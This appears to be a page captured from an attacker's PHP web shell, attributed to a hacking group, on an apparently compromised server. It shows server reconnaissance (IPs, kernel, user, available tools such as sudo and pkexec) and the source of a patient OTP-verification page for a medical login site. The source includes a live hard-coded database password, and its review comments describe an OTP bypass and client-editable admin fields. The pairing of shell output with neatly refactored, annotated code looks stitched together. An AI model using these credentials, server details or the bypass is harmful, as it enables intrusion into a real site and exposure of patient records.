Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.133.130.199
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/


Current File : /home/btiyawmy/www/login.easenup.in/document_verify.php
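<?php
// Request bootstrap for the OTP verification page: starts the session, loads
// the manager classes, and records a patient-access entry when either the
// "SKIP" (signup) or "Verify" button was posted.
session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
require_once('../patientmanager.php');

// NOTE(review): neither branch checks the OTP or that a user is logged in. The
// OTP comparison further down this file is gated on $_POST['submit'], while the
// rendered forms post 'verify' / 'signup', so as written a posted 'verify'
// reaches patientAccessTWO() without any OTP check — confirm intent.
// NOTE(review): adminid and entered_by arrive as client-editable hidden fields;
// they should presumably be derived from the server-side session instead.
// NOTE(review): patientAccessTWO() is defined elsewhere; verify that it binds
// these values as query parameters rather than concatenating them into SQL.
$access_fields = array('prescriptionid', 'patientid', 'adminid', 'typevisit', 'casetype', 'note', 'entered_by');

// The array keys are quoted: the original bare-word keys ($_POST[signup]) rely
// on undefined-constant fallback, which warns on PHP 7.2 and is fatal on PHP 8.
foreach (array('signup', 'verify') as $posted_action) {
	if (!isset($_POST[$posted_action])) {
		continue;
	}

	$access_args = array();
	foreach ($access_fields as $field_name) {
		$raw_value = isset($_POST[$field_name]) ? $_POST[$field_name] : '';
		// Arrays (e.g. note[]=x) would otherwise stringify to "Array" with a notice.
		$access_args[] = is_scalar($raw_value) ? (string) $raw_value : '';
	}

	PatientManager::patientAccessTWO(...$access_args);
}
?>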

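<?php

// OTP check for a patient: when ?patientid=... is present and the form was
// posted with 'submit', compare the posted OTP with patient.user_otp, mark the
// patient verified on a match, and redirect to profile.php.
//
// NOTE(review): database credentials are hard-coded in a file under the web
// root. Move them to configuration outside the document root and rotate the
// password, since anyone who can read this file can read the database.
// NOTE(review): nothing here limits repeated guesses or expires/clears the OTP
// after use; a short numeric OTP needs an attempt limit — confirm where that
// is enforced, if anywhere.
$connect = new PDO("mysql:host=localhost;dbname=btiyawmy_software", "btiyawmy_software", "@#admin@#");
$error_user_otp = '';
$patientid = '';
$message = '';
if(isset($_GET["patientid"]) && is_string($_GET["patientid"]))
{
	$patientid = $_GET["patientid"];
	if(isset($_POST["submit"]))
	{
		// Trim before the emptiness test so a whitespace-only value cannot be
		// compared against (and match) a blank user_otp column.
		$posted_otp = (isset($_POST["user_otp"]) && is_string($_POST["user_otp"])) ? trim($_POST["user_otp"]) : '';

		if(empty($posted_otp))
		{
			$error_user_otp = 'Enter OTP Number';
		}
		else
		{
			// Bound parameters replace the original string-concatenated SQL,
			// which let patientid / user_otp alter the query.
			$statement = $connect->prepare("
			SELECT 1 FROM patient
			WHERE patientid = :patientid
			AND user_otp = :user_otp
			LIMIT 1
			");

			$otp_matches = false;
			if($statement !== false && $statement->execute(array(':patientid' => $patientid, ':user_otp' => $posted_otp)))
			{
				$otp_matches = ($statement->fetchColumn() !== false);
			}

			if($otp_matches)
			{
				$statement = $connect->prepare("
				UPDATE patient
				SET numbers_status = 'verified'
				WHERE patientid = :patientid
				");

				if($statement !== false && $statement->execute(array(':patientid' => $patientid)))
				{
					// Provides $con (a mysqli connection) for the lookup below.
					include("../dbconnection.php");

					$prescriptionid = (isset($_GET['prescriptionid']) && is_string($_GET['prescriptionid'])) ? $_GET['prescriptionid'] : '';

					$lookup = mysqli_prepare($con, "SELECT prescriptionid FROM addaspatient WHERE patientid = ? AND prescriptionid = ?");
					if($lookup)
					{
						mysqli_stmt_bind_param($lookup, 'ss', $patientid, $prescriptionid);
						mysqli_stmt_execute($lookup);
						mysqli_stmt_bind_result($lookup, $row_prescriptionid);
						while(mysqli_stmt_fetch($lookup))
						{
							// URL-encode the query string and emit it as a JSON
							// string literal so request/database values cannot
							// break out of the <script> block.
							$target = 'profile.php?' . http_build_query(array(
								'prescriptionid' => $row_prescriptionid,
								'patientid' => $patientid,
							));
							echo '<script>window.location=' . json_encode($target, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ';</script>';
						}
						mysqli_stmt_close($lookup);
					}
				}
			}
			else
			{
				$message = '<label class="text-danger">Invalid OTP Number</label>';
			}
		}
	}
}
else
{
	$message = '<label class="text-danger">Invalid Url</label>';
}


?>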
<!DOCTYPE html>
<html lang="en">
  <meta charset="UTF-8">
  <meta content='yes' name='apple-mobile-web-app-capable'/>
<meta content='yes' name='mobile-web-app-capable'/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <link rel="stylesheet" href="./styles.css">
  <link rel="manifest" href="./manifest.webmanifest">
    <link rel="assetlinks" href="assetlinks.json">


    <title>OTP Verify</title>
    <link href="assets/css/bootstrap.css" rel="stylesheet">
    <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" />
    <link href="assets/css/style.css" rel="stylesheet">
    <link href="assets/css/style-responsive.css" rel="stylesheet">
  </head>

  <body>
	  <div id="login-page">
	  	<div class="container">
      
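	  	   <?php
// Renders the OTP entry form ("Verify") for each addaspatient row matching the
// patientid / prescriptionid query-string values.
include("dbconnection.php");
$narayan = LoginManager::currentUser();
$hari = LoginManager::getUserTypeByuname("$narayan");

// Attribute values below are single-quoted, so ENT_QUOTES is required.
$esc = static function ($value) {
	return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$q_patientid = (isset($_GET['patientid']) && is_string($_GET['patientid'])) ? $_GET['patientid'] : '';
$q_prescriptionid = (isset($_GET['prescriptionid']) && is_string($_GET['prescriptionid'])) ? $_GET['prescriptionid'] : '';

// Prepared statement instead of interpolating $_GET into the SQL text.
// Only the columns the form actually prints are selected.
$form_lookup = mysqli_prepare($con, "SELECT prescriptionid, patientid, hospitalid, typevisit, casetype FROM addaspatient WHERE patientid = ? AND prescriptionid = ?");
if ($form_lookup) {
	mysqli_stmt_bind_param($form_lookup, 'ss', $q_patientid, $q_prescriptionid);
	mysqli_stmt_execute($form_lookup);
	mysqli_stmt_bind_result($form_lookup, $r_prescriptionid, $r_patientid, $r_hospitalid, $r_typevisit, $r_casetype);

	while (mysqli_stmt_fetch($form_lookup)) {
		$h_prescriptionid = $esc($r_prescriptionid);
		$h_patientid = $esc($r_patientid);
		$h_hospitalid = $esc($r_hospitalid);
		$h_typevisit = $esc($r_typevisit);
		$h_casetype = $esc($r_casetype);
		$h_entered_by = $esc($hari);

		// NOTE(review): 'typevisit' is emitted twice; PHP keeps the last value
		// posted, so 'Patient Registration' is what the server receives.
		// The closing </div></form> was missing in the original, which left
		// this form open across the following markup.
		echo "
<form name='signup' method='post'>
    <input type='hidden' name='prescriptionid' value='{$h_prescriptionid}'>
  <input type='hidden' name='patientid' value='{$h_patientid}'>
<input type='hidden' name='adminid' value='{$h_hospitalid}'>
  <input type='hidden' name='typevisit' value='{$h_typevisit}'>
<input type='hidden' name='casetype' value='{$h_casetype}'>
<input type='hidden' name='entered_by' value='{$h_entered_by}'>
<input type='hidden' name='typevisit' value='Patient Registration'>

                   <input type='hidden' name='note' value='verify'>
		        <div class='login-wrap'>
		           
		            <br>
		            <input type='text' name='user_otp' id='user_otp' class='form-control' placeholder='Enter Your Six Digit OTP' ><br >
		            <input name='verify' value='Verify' class='btn btn-theme btn-block' type='submit'>
		            <br>
		        </div>
</form>
		       ";
	}

	mysqli_stmt_close($form_lookup);
}

  ?>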
	  
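           <?php
// Renders the "SKIP" form for each addaspatient row matching the patientid /
// prescriptionid query-string values.
// NOTE(review): this form posts 'signup', which the handler at the top of the
// file treats the same as a verification; confirm skipping the OTP is intended.
include("dbconnection.php");
$narayan = LoginManager::currentUser();
$hari = LoginManager::getUserTypeByuname("$narayan");

// Attribute values below are single-quoted, so ENT_QUOTES is required.
$esc = static function ($value) {
	return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$q_patientid = (isset($_GET['patientid']) && is_string($_GET['patientid'])) ? $_GET['patientid'] : '';
$q_prescriptionid = (isset($_GET['prescriptionid']) && is_string($_GET['prescriptionid'])) ? $_GET['prescriptionid'] : '';

// Prepared statement instead of interpolating $_GET into the SQL text.
// Only the columns the form actually prints are selected.
$skip_lookup = mysqli_prepare($con, "SELECT prescriptionid, patientid, hospitalid, typevisit, casetype FROM addaspatient WHERE patientid = ? AND prescriptionid = ?");
if ($skip_lookup) {
	mysqli_stmt_bind_param($skip_lookup, 'ss', $q_patientid, $q_prescriptionid);
	mysqli_stmt_execute($skip_lookup);
	mysqli_stmt_bind_result($skip_lookup, $r_prescriptionid, $r_patientid, $r_hospitalid, $r_typevisit, $r_casetype);

	while (mysqli_stmt_fetch($skip_lookup)) {
		$h_prescriptionid = $esc($r_prescriptionid);
		$h_patientid = $esc($r_patientid);
		$h_hospitalid = $esc($r_hospitalid);
		$h_typevisit = $esc($r_typevisit);
		$h_casetype = $esc($r_casetype);
		$h_entered_by = $esc($hari);

		// NOTE(review): 'typevisit' is emitted twice; PHP keeps the last value
		// posted, so 'Patient Registration' is what the server receives.
		echo "
<form name='signup' method='post'>
    <input type='hidden' name='prescriptionid' value='{$h_prescriptionid}'>
  <input type='hidden' name='patientid' value='{$h_patientid}'>
<input type='hidden' name='adminid' value='{$h_hospitalid}'>
  <input type='hidden' name='typevisit' value='{$h_typevisit}'>
<input type='hidden' name='casetype' value='{$h_casetype}'>
<input type='hidden' name='entered_by' value='{$h_entered_by}'>
<input type='hidden' name='typevisit' value='Patient Registration'>
  <button class='btn btn-theme btn-block' type='submit' name='signup'>SKIP</button> </form>";
	}

	mysqli_stmt_close($skip_lookup);
}

  ?>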
		        
		  
		      	  	
	  	
	  	</div>
	  </div>
    <script src="assets/js/jquery.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.backstretch.min.js"></script>
    <script>
        $.backstretch("assets/img/login-bg.jpg", {speed: 500});
    </script>

<script src="./index.js" type="module"></script>
  </body>
</html>

Anon7 - 2022
AnonSec Team